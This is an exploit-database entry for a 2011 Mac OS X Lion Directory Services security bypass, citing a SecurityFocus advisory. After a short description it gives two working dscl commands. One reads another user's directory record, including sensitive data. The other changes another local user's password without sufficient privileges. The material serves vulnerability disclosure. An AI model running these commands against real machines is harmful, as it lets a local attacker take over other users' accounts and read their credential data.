Apple Mac OSX (Lion) - Directory Services Security Bypass

EDB-ID:

36143

CVE:

N/A




Platform:

OSX

Date:

2011-09-19


source: https://www.securityfocus.com/bid/49676/info

Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges. 

$ dscl localhost -read /Search/Users/bob

$ dscl localhost -passwd /Search/Users/<username>